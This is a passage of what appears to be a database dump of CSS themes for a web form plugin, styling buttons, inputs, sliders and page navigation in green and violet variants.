font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(25,'Theme 07 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #00A25B;\r\nmargin-bottom: 10px;\r\ncolor: #00A25B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #00A25B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #00A25B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #00A25B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #00A25B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #00A25B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00A25B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00A15B ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00A25B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A25B ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00A25B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00A25B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00A25B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A  39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #00A25B 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15A 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A15B 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(26,'Theme 07 dark violet','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #33016B;\r\nmargin-bottom: 10px;\r\ncolor: #33016B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #33016B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	